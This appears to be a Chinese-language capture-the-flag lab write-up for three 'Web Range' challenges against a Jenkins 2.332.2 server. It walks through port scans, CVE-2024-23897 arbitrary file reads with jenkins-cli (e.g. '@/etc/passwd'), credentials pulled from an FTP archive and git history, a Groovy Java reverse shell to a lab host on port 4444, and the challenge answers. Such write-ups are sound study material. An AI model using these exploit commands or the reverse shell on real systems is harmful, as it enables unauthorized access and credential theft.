Web Range-123-125

# Web Range-123-125 ## Challenge 123 ## Challenge 124 ## Challenge 125 ![image](https://hackmd.io/_uploads/Syo3VCGFex.png) * Rustscan * ![image](https://hackmd.io/_uploads/H1q_HRMFgg.png) * Nmap * ![image](https://hackmd.io/_uploads/Sk4crCftxx.png) * ![image](https://hackmd.io/_uploads/SJyoB0MFel.png) * 沒掃到什麼可用路徑, 8080port是一個jenkins登入頁面, 框架版本是Jetty * ![image](https://hackmd.io/_uploads/Hyv0Y0MYxl.png) * ![image](https://hackmd.io/_uploads/rJwSqCGYel.png) * 用metasploit掃出jenkins版本, `2.332.2` * ![image](https://hackmd.io/_uploads/HJpwK1mtge.png) * 參考這篇, 之前打過[HTB的靶機](https://hackmd.io/iA7HK6vETNOmGNcKjukEOQ?view), CVE-2024-23897, 先下載jenkins-cli jar包 * https://0xdf.gitlab.io/2024/02/12/htb-builder.html#authenticate-jenkins-access * https://github.com/AiK1d/CVE-2024-23897/blob/main/jenkins-cli.jar * 任意讀檔 * ![image](https://hackmd.io/_uploads/SkL7rZmFle.png) ```zsh= java -jar jenkins-cli.jar -s 'http://10.10.1.194:8080' -auth admin:BmHRA0Q7ZnP1g56 connect-node '@/etc/passwd' ``` * Hostname is `JenRunn2` * ![image](https://hackmd.io/_uploads/S1-xbemFle.png) ```zsh= java -jar jenkins-cli.jar -s 'http://10.10.1.194:8080' help '@/etc/hostname a' ``` * 忘記有開ftp, 有個壓縮檔 * ![image](https://hackmd.io/_uploads/B1bE7b7Klx.png) * 有一組mysql credential * ![image](https://hackmd.io/_uploads/HyMoX-mYgl.png) * `root:PoFwwIe8$d!TiL*Fw` * 主要有這個 `.git`資料夾 * ![image](https://hackmd.io/_uploads/r1TAQbXFgg.png) * OK, found admin password for jenkins * ![image](https://hackmd.io/_uploads/HkaUVWQKgx.png) * `admin:BmHRA0Q7ZnP1g56` * `root:PFDqTiLFWAd!wIe8#@` ```zsh= git diff-tree -p HEAD ``` * 在 `/var/lib/jenkins/users/users.xml`看到一些資訊 * ![image](https://hackmd.io/_uploads/rJ2FFZmYeg.png) ```zsh= java -jar jenkins-cli.jar -s 'http://10.10.1.194:8080' -auth admin:BmHRA0Q7ZnP1g56 reload-job '@/var/lib/jenkins/users/users.xml' ``` * 繼續往下挖在`config.xml`挖到password hash * ![image](https://hackmd.io/_uploads/r14L5-mtex.png) * ![image](https://hackmd.io/_uploads/ryGrqWQKlg.png) * 找到一組密碼, 但是長度很長不知道用在哪 * ![image](https://hackmd.io/_uploads/rJ4sAZmKxl.png) * `12xcn2hbOv/+pT4ef/w/28TosA9gAZ2T4woxsLtk38S1A/SzH2j4sV0MmqOrHDuIx1QFPUz81n0cwPK5C7ZoIkTG0bDLkuGg+wy+kO1pmGjiDoCSd1I5kNxR9ORc/2ezetfjhF8sy5j6Q8IDL69n5i9ynPYzgOBpanuOCaLOEVV/VZY36LcRbHEmmungPuZ7` ## 之前打過的Groovy Script RCE * ![image](https://hackmd.io/_uploads/BkREUBQFxx.png) * 也根據這篇打Jenkins的各種姿勢, 利用Groovy script拿到shell * https://github.com/gquere/pwn_jenkins * ![image](https://hackmd.io/_uploads/Bk1vLSXFxx.png) * ![image](https://hackmd.io/_uploads/B1o9UBQtxg.png) ```java String host="172.27.232.2"; int port=4444; String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` * `/var/www/html/index.html` 又找到一組hash * ![image](https://hackmd.io/_uploads/ry38UwQFxe.png) * `464e0fb146194482a3ab153fc11e6346175a63f0` * ok, 之前 `git log`那組root帳號直接可以 `su root`, 他根本沒開ssh = = * ![image](https://hackmd.io/_uploads/S14rQdStge.png) ## Answer * Challenge 123:`admin and BmHRA0Q7ZnP1g56` * Challenge 124:`Jen_Runn_2_ZFCQ` * 題目說叫file.txt結果答案是flag.txt?? * ![image](https://hackmd.io/_uploads/HyfSjDmtgl.png) * Challenge 125:`FZCQ_passwd_root`